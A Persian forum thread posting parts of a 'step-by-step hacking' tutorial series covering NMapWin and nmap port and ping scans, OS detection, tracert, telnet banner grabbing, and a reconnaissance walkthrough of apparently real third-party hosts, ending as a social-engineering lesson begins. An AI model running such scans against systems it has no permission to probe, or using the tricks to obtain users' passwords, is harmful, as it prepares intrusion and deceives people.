درقسمت From و To مشخص می‌کنيم که از کدام ip تا کدام ip را می‌خواهيم pingکنيم. با فشار دکمه Ping ليست ip هايی که up هستند، نمايش داده می‌شود.فرض کنيد که ip فعلی شما 195.219.176.88 باشد و بخواهيم بدانيم در کلاس C مربوط به ما چه ip های ديگری up هستند. در اين حالت بايد 195.219.176.1 تا 195.219.176.254 را ping کنيم.

د) حالا می‌خواهيم همين کار را با NMapWinانجام دهيم. برای اينکار بايد در برگه Scan، قسمت Mode را در حالت PingSweep قرار دهيد. برگه Discover بايد درحالت ICMP Ping باشد و در قسمتOptions بايد گزينه OS Detection را از حالت انتخاب شده خارج کنيد. بعدبايد ليست ip ها را تنظيم کنيم، برای اينکار بايد در قسمت Host ، ليست ipها را وارد می‌کنيم. مثلا اگر بخواهيم 195.219.176.1 تا 195.219.176.254را تست کنيم بايد بنويسيم: 24/195.219.176.0 که اين 24/ يعنی کلاس C که از ۱ تا ۲۵۵ است. و بعد دکمه Scan را فشار دهيم.
Host (195.219.176.0) seems to be a subnet broadcast address ...
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Host (195.219.176.1) appears to be up.
Host (195.219.176.3) appears to be up.
Host (195.219.176.5) appears to be up.
Host (195.219.176.7) appears to be up.
Host (195.219.176.9) appears to be up.
Host (195.219.176.11) appears to be up.
Host (195.219.176.12) appears to be up.
Host (195.219.176.13) appears to be up.
Host (195.219.176.14) appears to be up.
Host H-GVSVY95KXINRJ (195.219.176.15) appears to be up.
Host (195.219.176.16) appears to be up.
Host (195.219.176.17) appears to be up.
Host (195.219.176.18) appears to be up.
Host (195.219.176.19) appears to be up.
Host KERYASBA (195.219.176.20) appears to be up.
Host MARYAM (195.219.176.22) appears to be up.
Host (195.219.176.23) appears to be up.
Host (195.219.176.24) appears to be up.
Host FFX-L2XA0ZM87Q3 (195.219.176.25) appears to be up.
Host (195.219.176.26) appears to be up.
Host (195.219.176.27) appears to be up.
Host (195.219.176.28) appears to be up.
,...ملاحظه می‌فرماييد که در بعضی موارد اسم کامپيوتر مربوط به ip هم ذکر شده است.


۲-در تمام روش‌های بالا، از پکت‌های ICMP برای پينگ استفاده کرديم. در بعضیکامپيوتر‌ها ممکن است پکت‌های ICMP توسط فايروال يا روتر بلاک شوند. دراين حالت بايد از پورت اسکنينگ برای IP اسکنينگ استفاده کرد! برای اين‌کارمی‌توان از ابزارهای زير استفاده کرد:

الف) در سيستم عامل يونيکس (لينوکس) می‌توان از ابزارهايی مثل hping و icmpenum و ... استفاده کرد. که فعلا بحث ما نيستند.

ب)در سيستم‌عامل ويندوز، بازهم از NMapWin استفاده می‌کنيم. ولی طوری PortScanning می‌کنيم که نياز ما را برای IP Scanning جواب دهد. اين‌کار توسطيک سری پورت‌های عمومی صورت می‌گيرد که در اکثر کامپيوتر‌ها باز هستند مثل۸۰ ، ۲۵ و...
برای اين‌کار در برگه Scan ، قسمت Mode را در حالتConnect تنظيم می‌کنيم و در قسمت Scan Options ، گزينه Port Range را مثلابرای عدد 80 تنظيم می‌کنيم. Discover را در حالت TCP Ping قرار می‌دهيم. ودر برگه Option ، گزينه OS Detection را از حالت انتخاب شده خارج می‌کنيم.ليست ip ها را ست کرده و اسکن را شروع می‌کنيم.

uody
4th February 2011, 10:50 AM
داریم به قسمت های پایانی نزدیک میشــــــــــــــــــــــ ــــــیما قسمت 9وم هم برای شما
آموزش قدم به قدم هک قسمت 9
موضوع:nmap
- معرفی nmap و NMapWin

اگربخواهيد مهم‌ترين ابزاری را که يک هکر برای footprinting استفاده می‌کندبدانيد، آن نرم‌افزار nmap خواهد بود که برای سيستم‌های لينوکس و يونيکسطراحی شده است. برای هکرهای تازه‌کار که سيستم‌عامل ويندوز را به کارمی‌برند، نسخه گرافيکی و تحت ويندوزی طراحی شده است که NMapWin نام دارد وهمان امکانات را فراهم می‌آورد. بحث اين‌ جلسه درباره اين نرم‌افزار است.برای دانلود اين نرم‌افزار اينجا را کليک کنيد! اندازهبرنامه 6.18 مگابايت است و اگر اتصالتان dial-up است، کمی طول خواهد کشيد.ضمنا توجه کنيد که اين برنامه مخصوص ويندوز ۲۰۰۰ و xp است.

ايننرم‌افزار مجموعه ابزارهای footprinting مثل پورت اسکن، آی‌پی اسکن، تشخيصسيستم‌عامل کامپيوتر مورد نظر (OS detection) و … را گرد هم آورده است.شکل ظاهری برنامه را در زير می‌بينيد:


[تصویر: n13811015.gif]



- بررسی ظاهر برنامه

شکل ظاهری برنامه چهار قسمت دارد:

۱- Network Section :
بالاترينقسمت پنجره برنامه است که محلی برای ورود ip يا ip‌ ها دارد به نام Host.بعد از وارد کردن ip و تنظيم کردن پارامترها، دکمه Scan را کليک می‌کنيمتا کار اسکن شروع شود.
اگر قرار باشد بيش از يک ip وارد شود، اين کاررا می‌توان به صورت‌های مختلف انجام داد. مثلا: *.*.192.130 يعنی تمام ipهايی که با 192.130 شروع می‌شوند ولی دو عدد بعدی هرچيزی می‌تواند باشد. ونوشتن به صورت 15-192.130.120.12 يعنی عدد آخری می‌تواند از ۱۲ تا ۱۵ باشد.

۲- Option Folder :
اينقسمت در واقع محل تنظيمات است و به کمک آن مشخص می‌کنيم که از برنامهمی‌خواهيم که چه‌کاری انجام دهد که مفصلا در موردش صحبت خواهم کرد. در اينقسمت، برگه‌هايی با نام‌های Option , Discover , Scan , ... وجود دارد.

۳- Log Output :
محل ظاهر شدن نتايج است. در حالتی که اسکن شروع نشده باشد، خالی است.

۴- Status bar :
پايين‌ترين بخش پنجره برنامه است و دو بخش مهم دارد:
قسمتسمت چپ نشان می‌دهد که اگر بخواهيم در nmap همين کار رو انجام بديم، چهسويچ‌هايی را بايد بکار بريم ( دقت کنيد که nmap برخلاف NMapWin گرافيکینيست ). هر تغييری که در قسمت Option Folder اعمال کنيم، در اين قسمتتغييری را مشاهده می‌کنيم و توصيه می‌کنم که حتما به اين قسمت توجهويژه‌ای داشته باشيد.
اما در سمت راست آن، يک مربع کوچک مشاهده می‌شودکه می‌تواند به رنگ‌های سبز يا قرمز باشد. سبز يعنی اينکه برنامه آمادهبرای اجرای دستورات شماست و قرمز يعنی در حال انجام دستورات وارد شده استو فعلا دستور جديد نمی‌پذيرد.


- شروع کار با NMapWin

فرضکنيد که می‌خواهم سايت far30.com رو می‌خواهم مورد بررسی قرار دهم. برایاينکار ابتدا ip رو بدست‌ آورده (63.148.227.65) و در قسمت Host تايپمی‌کنيم. حالا فعلا بدون اعمال تغييری در قسمت Option Folder ، دکمه Scanرو کليک می‌کنيم. اسکن شروع می‌شود و بعد از چند دقيقه، نتايج زير در قسمتLog Output ظاهر می‌شود:
Starting nmap V. 3.00 ( http://www.insecure.org/nmap )
Interesting ports on (63.148.227.65):
(The 1583 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
31/tcp open msg-auth
53/tcp open domain
80/tcp open http
110/tcp open pop-3
135/tcp open loc-srv
143/tcp open imap2
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1050/tcp open java-or-OTGfileshare
1433/tcp open ms-sql-s
3372/tcp open msdtc
3389/tcp open ms-term-serv
6666/tcp open irc-serv
7007/tcp open afs3-bos
Remote operating system guess: Windows 2000/XP/ME
Nmap .... -- 1 IP address (1 host up) scanned in 156 seconds
در همين‌جا سه نوع اطلاعات قابل دسترسی است:
۱- ليست پورت‌های باز روی کامپيوتر سرور و کاربرد آن پورت‌ها
۲- تشخيص سيستم عامل که Windows 2000/XP/ME حدس زده شده است (سطر ماقبل آخر)
۳- و سطر آخر می‌گويد که اين ip روشن (up) است.


- بررسی برگه Scan از قسمت Option Folder

اين برگه خود ۲ بخش دارد:

+> بخش Mode :
در درس‌های قبلی گفتم که اسکنينگ انواع مختلفی داره، و اينجا جايی است که نوع اسکنينگ رو مشخص می‌کنيم:
- Connect : اسکن از نوع TCP connect scan است که قبلا در درس هفتم درباره‌اش بحث کرده‌ام.
- SYN Stealth : در درس هفتم درباره اين هم گفته‌ام. - پيش‌فرض هم همين است
- Null Scan , Xmas tree , FIN Stealth : برای سرورهای غير از ويندوز کار می‌کنند.
- UDP Scan : برای اسکن کردن پورت‌های udp است.
- Ping Sweep : برای عمل ip scanning است که بدانيم که از بين يک سری ip کدام‌ها فعال هستند.
- List Scan : همان Ping Sweep است ولی به طوری که ip مان لو نرود.
- ACK Scan : معمولا برای تشخيص فايروال‌ها کاربرد دارد.
- Window Scan : همان ACK Scan است ولی کامل‌تر
- RCP Scan : جزو کامل‌ترين حالت‌های اسکنينگ است با اطلاعات فراوان.

+> بخش Scan Options :
اين قسمت شش گزينه دارد که فقط يکی‌شان به درد می‌خوره:
-Port Range : مشخص می‌کند که چه پورت‌هايی بايد اسکن شود: اگر خالی بماند،يعنی همه پورت‌ها ، اگر يک عدد نوشته شود يعنی فقط آن پورت و اگر به‌صورتn-m نوشته شود (که n و m عدد هستند) يعنی از پورت n تا پورت m اسکن شود.


- بررسی برگه Discover از قسمت Option Folder

اين برگه دارای چهار گزينه است:

- TCP Ping : برای بررسی فعال بودن کامپيوتر مورد نظر می‌تواند به‌کار رود.
- ICMP Ping : پينگ فقط از نوع ICMP باشد.
- TCP+ICMP : برای بررسی فايروال‌ها مناسب است (پيش‌فرض)
- Don"t Ping : پينگ نکند.


- بررسی برگه Options از قسمت Option Folder

اين برگه خود ۲ بخش دارد:

+> بخش Options :

-Fragmentation : اگر بخواهيم در اسکنينگ‌هايی از نوع Null, Xmas, FIN, SYNتا حدودی تغييرات اعمال کنيم تا حداقل خطر را برای ما داشته باشند،می‌توان اين گزينه را انتخاب کرد. ولی بايد توجه داشت که گاهی با انتخاباين گزينه اسکنينگ موفقيت آميز نخواهد بود.
- Get Idented Info : اگربخواهيم اسکنينگ از نوع connect صورت دهيم، با انتخاب اين گزينه گاهاطلاعات ذی‌قيمتی برای ما به ارمغان می‌آورد.
- Resolve All : در حالتپيش‌فرض، اين نرم‌افزار روی ip هايی که up هستند، عمل Reverse Whois راانجام می‌دهد (يعنی از روی ip، به دنبال اسم DNS مربوطه می‌گردد). اگرResolve All را انتخاب کرده باشيم، روی همه ip ها، چه up و چه down عملReverse Whois انجام خواهد شد.
- Don"t Resolve : هرگز Reverse Whois نخواهد کرد.
-OS Detection : از جمله مهم‌ترين گزينه‌های اين نرم‌افزار است که اگرانتخاب‌شده باشد، برنامه سعی می‌کند که سيستم‌عامل کامپيوتر مقابل را حدسبزند.
- Random Host : به صورت تصادفی ip هايی را تست می‌کند، و هرگز هم به پايان نمی‌رسد.

+> بخش Debug :

- Debug : اگر مارک شده باشد، نتايج ديباگ مرحله به مرحله در خروجی نشان داده می‌شود.
- Verbose : اگر انتخاب‌شده باشد، پيشرفت کار را نشان می‌دهد.
- Very Verbose : پيشرفت کار را با نهايت جزئيات نشان می‌دهد.


- بررسی برگه Timing از قسمت Option Folder

اين برگه خود ۲ بخش دارد:

+> بخش Throttle :

دراين بخش هرچه گزينه‌های بالاتر را انتخاب کنيد، کار کندتر و دقيق‌تر است واحتمال detection (لو رفتن) شما کمتر است و هرچه پايين تر برعکس. به نظرمی‌رسد، Normal بهترين انتخاب باشد.

+> بخش Timeouts :

- Host Timeout : حداکثر زمانی را مشخص می‌کند که برای يک ip می‌تواند صرف شود.
- Max RTT : حداکثر زمانی را مشخص می‌کند که برای يک probe می‌تواند صرف شود. پيش‌فرض، 9000 است (يعنی ۹ ثانيه)
- Min RTT : برای هر probe حداقل به اين اندازه صبر می‌کند.
- Initial RTT : اين گزينه خصوصا در ip هايی که فايروال دارند، مفيد است.
-Parallelism : اگر در مورد acw_spscan دقت کرده‌ باشيد، اين برنامه هر بارفقط يک پورت را پروب می‌کند و نه بيشتر ( به همين خاطر است که اول اسم آنsimple دارد ). ولی محصولات واقعی بايد همزمان تعدادی پورت را تست کنند.در اين قسمت می‌توان حداکثر تعداد پورت‌هايی که می‌تواند همزمان پروب شوندرا مشخص می‌کنيم.
- Scan Delay : بين هر اسکن، حداقل به اين ميزان صبر می‌کند.


- بررسی برگه Files از قسمت Option Folder

اين برگه خود ۲ بخش دارد:

+> بخش Input :

برای اينکه روند کارها را سريع‌تر کنيم، می‌توان از اين بخش استفاده کرد. در اين حالت ورودی از يک فايل خوانده می‌شود.

+> بخش Output :

اينقسمت برای آن است که نتايج را در يک فايل ذخيره کنيم. اين فايل می‌تواندبه‌صورت Normal (متنی معمولی)، Grep (که الان ديگه به‌کار نميره)، XML ويا All (هر سه مورد) باشد.


- بررسی برگه Service از قسمت Option Folder

فرضکنيد می‌خواهيد اول هر هفته فلان ip رو تست کنيد و کارهايی از اين‌دست...اين برگه برای همين‌جور کارهاست (ميشه گفت يک نوع اتوماسيون)


- بررسی برگه Win32 از قسمت Option Folder

اين برگه دو بخش دارد به نام‌های Options , Commands که فقط Options رو بررسی می‌کنم:

-No Pcap : وقتی که NMapWin را نصب می‌کنيم، Pcap هم نصب می‌شود ( که فقطروی سيستم‌های ويندوز ۲۰۰۰ و xp می‌تواند نصب شود) و کارها را برعهدهمی‌گيرد. اگر بخواهيم که از آن استفاده نشود و به‌جای آن از Raw Socketاستفاده شود، اين گزينه را مارک می‌کنيم.
- No IP HLP Api : مثل بالايی فقط اينکه بين ارسال هر پکت، ۱۵ ثانيه منتظر می‌ماند.
- No Raw Sockets : با انتخاب آن Raw Socket به‌کار نمی‌رود.
- Force Raw Socket : باعث می‌شود که فقط Raw Socket به‌کار رود.
- Win Trace : برای سيستم‌های Win32 کمی اطلاعات بيشتری به‌دست می‌دهد.


- استفاده از NMapWin برای تعيين نوع سيستم عامل

اگرمهم‌ترين کاربرد‌های nmap را بخواهيم بدانيم، يکی port scanning و ديگریOS detection (تشخيص سيستم‌عامل مقابل) است که ويژگی دوم به قدری مهم استکه گاه nmap را با همين ويژگی می‌شناسند. برای اينکه نوع سيستم‌عامل راتعيين کنيم، بايد در برگه Options از NMapWin، گزينه OS detection انتخابشده باشد.
حالا چند مثال را بررسی می‌کنيم (شما خودتان اين‌ ip ها و ip های ديگر را تست و تمرين کنيد) :

194.225.184.15
Remote operating system guess: Windows 2000 server SP2

195.219.176.5
Remote operating system guess: Linux Kernel 2.4.0 - 2.5.20

206.104.238.208
Remote operating system guess: Linux 2.1.19 - 2.2.20

217.66.199.6
(Remote operating system guess: Cisco router running IOS 12.1.5-12.2(6a

63.148.227.65
Remote operating system guess: Windows 2000/XP/ME

194.225.184.2
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
در اين مورد می‌بينيد که nmap موفق به تعيين نوع سيستم‌عامل نشده است. ممکن است دليلش اين باشد که ip در آن لحظه up نبوده‌ است.

نکته‌ای که بايد در نظر داشت اين است که گاه بايد از يک سری اطلاعات فنی هم استفاده کرد تا به جواب قطعی رسيد :
-مثلا ip ماقبل آخر که نتيجه آن به صورت Windows 2000/XP/ME ظاهر شده است،متعلق به sazin.com است که چون يک سايت است و بايد در يک سرور باشد و هيچسروری نمی‌تواند ME يا XP باشد، پس سيستم‌عامل آن Win 2000 خواهد بود.
-يا يک حالت ديگر موردی است که ببينيد صفحات يک وب سايت با asp يا asp.netدرست شده است (مثلا اسم صفحه به صورت zzzzzz.asp يا zzzzzz.aspx باشد، کهنمونه آن سايت far30.com است که اسم همين صفحه default.asp است). در اينحالت سرور آن حتما سروری از محصولات مايکروسافت است مثل Win NT و يا Win2000 و نمی‌تواند Linux يا Unix يا Sun Solaris و... باشد.


- چگونه از nmap استفاده کنيم؟

قبلابا نرم‌افزار NMapWin آشنا شديد که نسخه گرافيکی nmap برای ويندوز بود.nmap در واقع نرم‌افزار اصلی است که هم برای يونيکس (لينوکس) و هم برایويندوز نسخه‌هايی را دارد. nmap برخلاف NMapWin، حالت خط فرمانی (commandprompt) دارد. در اين قسمت می‌خواهيم با nmap مخصوص ويندوز آشنا شويم.برای داون‌لود اين نرم‌افزار اينجارا کليک کنيد. (اگر قبلا NMapWin را نصب نکرده‌ايد، بايد از يک نسخه ديگراز nmap که اصطلاحا nmap installer نام دارد، استفاده کنيد. اين نسخه nmapرا می‌توانيد از اينجا داون‌لود کنيد. )
همان‌‌طورکه می‌دانيد، در نرم‌افزارهای خط فرمانی، بايد از پارامترها استفاده کنيم.با توجه به اينکه پارامترهای nmap بسيار زياد و يادگيری آنها مشکل است، مابرای پيدا کردن پارامترهای درست برای يک عمل خاص ( که معمولا ip scanningيا port scanning است) از NMapWin استفاده می‌کنيم. به اين ترتيب که درNMapWin تنظيمات را انجام می‌دهيم و بعد در پايين پنجره آن مشاهده می‌کنيدکه در قسمت :CMD ليست پارامترها را به دست می‌آوريم. اين مراحل را با دومثال شرح می‌دم:

۱- می‌خواهيم برای پورت‌های ۱ تا ۲۰۰ در کامپيوتریکه ip آن 63.148.227.65 است، يک پورت اسکننيگ انجام دهيم. برای اين‌کار درNMapWin، برگه Scan را درحالت SYN Stealth تنظيم می‌کنيم و Port Range رامی‌نويسيم: 200-1 و بعد برگه Discover بايد در حالت TCP+ICMP باشد و اگربخواهيم نوع سيستم‌عامل را هم مشخص کنيم، در برگه Options، گزينه OSdetection را در حالت انتخاب شده قرار می‌دهيم. ip را هم در بالای پنجره،63.148.227.65 می‌نويسيم. حالا آماده اسکن هستيم ولی ما می‌خواهيم اين کاررا با nmap انجام دهيم، پس فقط بايد قسمت CMD را از پايين پنجره ببينيد،ملاحظه می‌کنيد که نوشته شده:
CMD: -sS -PT -PI -p 1-200 -O -T 3 63.148.227.65
با حذف کلمه :CMD به عبارت زير می‌رسيم:
-sS -PT -PI -p 1-200 -O -T 3 63.148.227.65
اينها پارامتر‌هايی است که بايد در nmap استفاده کنيد. به اين صورت که می‌نويسيد:
nmap -sS -PT -PI -p 1-200 -O -T 3 63.148.227.65
و بعد از اجرای دستور و صبر کردن برای چند دقيقه، نتايج را می‌بينيم.
بعداز مدتی که با nmap کار کنيد، اين پارامترها را می‌آموزيد و ديگه نيازی بهNMapWin نخواهيد داشت. مثلا همين O- يعنی OS detection، و 200-p 1 يعنیپورت‌های ۱ تا ۲۰۰ می‌باشد. بعدها خودتان می‌بينيد که کار کردن با nmapبسيار دلچسب‌تر از NMapWin است.

۲- می‌خواهيم يک ip scanning انجامدهيم برای 195.219.176.0 تا 195.219.176.10 . برای اينکار در NMapWin، دربرگه Mode، گزينه Ping Sweep را انتخاب می‌کنيم. در برگه Discovery، گزينهICMP Ping را انتخاب کرده و در برگه Options، گزينه OS detection را درحالت انتخاب نشده قرار می‌دهيم. برای نوشتن ip ملاحظه می‌فرماييد که195.219.176 در هر دو مشترک است، پس می‌نويسيم: 10-195.219.176.0 .حالامی‌بينيم که پارامترها به صورت زير است:
-sP -PI -T 3 195.219.176.0-10
پس ما می‌نويسيم:
nmap -sP -PI -T 3 195.219.176.0-10

uody
5th February 2011, 11:29 AM
دوستان منبع همه این19 قسمت رو معرفی میکنم از سایت

www.vispar.ir

قسمت 10وم برای کسی که از همه اینا توراه درستی استفاده میکنه

آموزش قدم به قدم هک قسمت10
موضوع:ping &tracert
- ping چيست ؟

pingدستوری است که مشخص می‌کند که آيا يک کامپيوتر خاص که ما ip يا domain آنرا می‌دانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدتزمان رسيدن بسته‌های tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است.
کاربرد اين دستور به صورت زير است:
ping ip-or-domain
که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را می‌گذاريم.

مثلا ping sazin.com را در command prompt تايپ کردم و به نتايج زير رسيدم :
Pinging sazin.com [63.148.227.65] with 32 bytes of data:

Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105

Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 1402ms, Average = 1043ms
اين نتايج نشان می‌دهد که sazin.com فعال است.

حالابه کامپيوتری با ip شماره 63.148.227.65 (که همان sazin.com است)، pingمی‌کنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنایمدت زمان رسيدن پکت را می‌دهد، با توجه به ترافيک شبکه، کم و زياد خواهدشد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر می‌کنم:
Pinging 63.148.227.65 with 32 bytes of data:

Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105

Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 881ms, Average = 861ms
فرض کنيد که به يک ip که فعال نيست، ping کنيم:
Pinging 217.66.196.1 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 217.66.196.1:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
که نشان می‌دهد که آن ip در آن لحظه فعال نيست.

البتهتمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصلشده‌ايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما بهدرستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيداکردن ايراد در شبکه است.


- tracert چيست ؟

tracert( در يونيکس می‌شود traceroute ) ابزاری است که نشان می‌دهد که يک packetاطلاعاتی از کامپيوتر شما چه مسيری را طی می‌کند و از چه کامپيوترهايیمی‌گذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص می‌کنيم و معمولا همانکامپيوتری است که داريم footprinting می‌کنيم.

کاربرد اين دستور به صورت زير است:
tracert ip-or-domain
مثلامی‌خواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به sazin.comبرسيم. برای اينکار می‌توان از يکی از دستورهای زير استفاده کرد:
tracert sazin.com
tracert 63.148.227.65
به نتيجه زير رسيدم:
Tracing route to sazin.com [63.148.227.65]
over a maximum of 30 hops:

1 160 ms 160 ms 160 ms 217.218.84.3
2 381 ms 691 ms 1772 ms 217.218.84.5
3 * * 2324 ms 217.218.77.1
4 201 ms 1101 ms 180 ms 217.218.0.252
5 341 ms 220 ms 180 ms 217.218.0.2
6 1993 ms 180 ms 181 ms 217.218.158.41
7 180 ms 160 ms 160 ms 195.146.63.101
8 2824 ms * * 195.146.32.134
9 1472 ms 1463 ms 871 ms 195.146.33.73
10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161]
11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77]
12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245]
13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134]
14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174]
15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62]
16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33]
17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205]
18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197]
19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210]
20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94]
21 852 ms * 882 ms 64.156.25.74
22 961 ms 942 ms 841 ms 63.148.227.65

Trace complete.
ايننتايج نشان می‌دهد که بايد از ۲۲ کامپيوتر بگذرم تا به sazin.com برسم.اين اطلاعات همان‌طور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيداکردن فايروال‌ها و ... است. (بعضی سطرها رو کوتاه کردم و به‌جاش ....گذاشتم)


tracert دارای تعدادی switch است که دوتاش رو توضيح می‌دم:

d- ==>
با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده می‌شود.
مثلا می‌نويسيم: tracert sazin.com -d

h max-hops- ==>
حداکثر تعداد گام‌ها را تعيين می‌کند. حالت پيش‌فرض ۳۰ است.
مثلا می‌نويسيم: tracert sazin.com -h 50



از اين دستور بعدا بسيار استفاده خواهيم کرد.


- ادامه بحث telnet

telnetهم جزو مواردی است که در footprinting مورد استفاده قرار می‌گيرد. کاربردآن در حالتيست که بخواهيم بدانيم که روی فلان پورت چه برنامه‌ای فال‌گوش‌هو version آن چنده. به اين صورت که به يک پورت خاص (که مي‌دانيم روی آنسرور باز است) تلنت می‌کنيم و بعد می‌بينيم که نتايجی ظاهر می‌شود کهنشان‌دهنده اطلاعاتی‌ است که به‌کار می‌رود. گاهی با مکثی طولانی مواجهمی‌شويم و هيچ چيزی نمايش داده نمی‌شود، در اين حالت يکی دوبار , Ctrl+Z ,Ctrl+D , Ctrl+C , Ctrl+break را می‌زنيم و خارج می‌شويم. در مثال پايينجمع‌بندی مواردی که تا حالا از footprinting گفته‌ام را می‌آورم.


- جمع‌بندی مطالب گفته شده و بررسی يک سايت

فرض کنيد می‌خواهيم در مورد http://www.iums.ac.ir اطلاعاتی کسب کنيم :

◊ اول به سايت پينگ می‌کنم و ip آن را به‌دست می‌آورم: 194.225.184.15

◊به کمک ip که به‌دست آورديم، به کمک يک پورت اسکنر پورت‌ها را بررسیمی‌کنيم و می‌بينيم که پورت‌هايی مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹،۱۴۳ و ... باز است.

◊ چون domain به ir ختم می‌شود، برای whoisکردن از whois.nic.ir استفاده می‌کنم و Name Server آن را به دست می‌آورمکه 194.225.184.20 است.

◊ به کمک اين Name Server ، يک nslookup می‌کنم و به نتايج زير می‌رسم:
iums.ac.ir. SOA sina.i........0 345600)
iums.ac.ir. NS sina.iums.ac.ir
iums.ac.ir. NS ns1.nic.ir
iums.ac.ir. MX 10 sina.iums.ac.ir
smtp.iums.ac.ir. A 195.146.34.181
sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6
sina.iums.ac.ir. MX 10 sina.iums.ac.ir
sina.iums.ac.ir. A 194.225.184.20
sina.iums.ac.ir. A 195.146.34.181
sun.iums.ac.ir. CNAME sina.iums.ac.ir
cisco.iums.ac.ir. CNAME router.iums.ac.ir
webmail.iums.ac.ir. A 195.146.34.181
linux.iums.ac.ir. A 194.225.184.19
linux.iums.ac.ir. HINFO Intel-Xeon/800 RedHat-Linux-7.2
mta.iums.ac.ir. A 195.146.34.181
pop3.iums.ac.ir. CNAME sina.iums.ac.ir
localhost.iums.ac.ir. A 127.0.0.1
proxy.iums.ac.ir. CNAME arvand.iums.ac.ir
http://www.iums.ac.ir. A 195.146.34.180
atrak.iums.ac.ir. A 194.225.184.14
ns1.iums.ac.ir. CNAME sina.iums.ac.ir
arvand.iums.ac.ir. A 194.225.184.13
router.iums.ac.ir. A 194.225.184.1
router.iums.ac.ir. HINFO Cisco3640/Access-Server IOS-IP-12.0
iums.ac.ir. SOA sina.iu.......3456000 345600)
تکتک سطرهای اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNOصحبت می‌کنم که برای مشخص تر بودن در بالا به صورت کمی فرورفته‌تر نوشتم.مثلا:
sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6 HIFNOبرای تعيين نوع کامپيوتر و سيستم‌عامل سرور اهميت دارد. در اين سطر مشخصاست که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفادهمی‌کند.


◊ چون پورت‌های باز را هم توسط پورت اسکنر به دست آورده‌ام به آنها تلنت می‌کنم با دستور:
telnet http://www.iums.ac.ir portnum
نتايج حاصل از بعضی را می‌بينيد:

25 :
... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220
پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده می‌کند.

110 :
.OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+
پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده می‌کند.

119 :
NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed

uody
6th February 2011, 10:02 AM
لطف کنید و به قسمت 11وم توجه بفرمایید

آموزش قدم به قدم هک قسمت 11
موضوع:social engineering
- Social Engineering چيست؟

SocialEngineering يا مهندسی اجتماعی، تکنيکی است که بر گول زدن مردم استواراست. در اين تکنيک شما با انسان‌ها سر و کار داريد و نه با کامپيوترها.حال اگه يک user رو مثلا گول بزنيد، می‌توانيد اطلاعات او را مثل پسورد و... را بدست بياوريد که نمونه‌ای است از Client Hacking و اگه Administerيک سايت را گول بزنيد و سايت را هک کنيد، نمونه‌ای است از Server Hacking.پس با مهندسی اجتماعی هم می‌شود کلاينت هک کرد و هم سرور. البته چونکلاينت‌ها معمولا user های کم‌سوادتری (از نظر دانش هک) دارند، هک کردنآنها بسيار آسان‌تر است.
اين نکته را هم بايد بگم که روش SocialEngineering معمولا در مراحل اوليه هک استفاده می‌شود و بعد از آن بايدمسير را عوض کنيد و از اطلاعات فنی‌تان برای ادامه کار بهره ببريد.


- مثال‌هايی از مهندسی اجتماعی

